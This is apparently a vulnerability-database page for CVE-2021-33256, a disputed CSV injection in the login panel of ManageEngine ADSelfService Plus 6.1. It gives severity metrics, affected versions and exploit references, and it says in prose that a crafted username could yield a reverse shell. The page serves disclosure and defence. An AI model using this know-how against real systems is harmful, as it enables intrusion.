CVE-2021-33256
Last modified
CVE-2021-33256 is a high-severity vulnerability rated 8.8/10 on the CVSS scale. A CSV injection vulnerability on the login panel of ManageEngine ADSelfService Plus Version: 6.1 Build No: 6101 can be exploited by an unauthenticated user. The j_username parameter seems to be vulnerable and a reverse shell could be obtained if a privileged user exports "User Attempts Audit Report" as CSV file. EPSS estimates a 79.00% chance of exploitation in the next 30 days.
Description
A CSV injection vulnerability on the login panel of ManageEngine ADSelfService Plus Version: 6.1 Build No: 6101 can be exploited by an unauthenticated user. The j_username parameter seems to be vulnerable and a reverse shell could be obtained if a privileged user exports "User Attempts Audit Report" as CSV file. Note: The vendor disputes this vulnerability, claiming "This is not a valid vulnerability in our ADSSP product. We don't see this as a security issue at our side.
Metrics
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Weakness Enumeration
Affected Software
| Vendor | Product | Versions | Update |
|---|---|---|---|
| Zohocorp | Manageengine Adselfservice Plus | 6.1 | 6101 |
References
- https://docs.unsafe-inline.com/0day/manageengine-adselfservice-plus-6.1-csv-injectionExploit, Third Party Advisory
- https://docs.unsafe-inline.com/0day/manageengine-adselfservice-plus-6.1-csv-injectionExploit, Third Party Advisory
Timeline
- Published
- Last Modified
- Status
- Modified
Frequently Asked Questions
What is CVE-2021-33256?
How severe is CVE-2021-33256?
How do I fix CVE-2021-33256?
Are you affected by CVE-2021-33256?
Run a free Strix scan to check your systems for this vulnerability.
Scan your code nowSource: NVD / NIST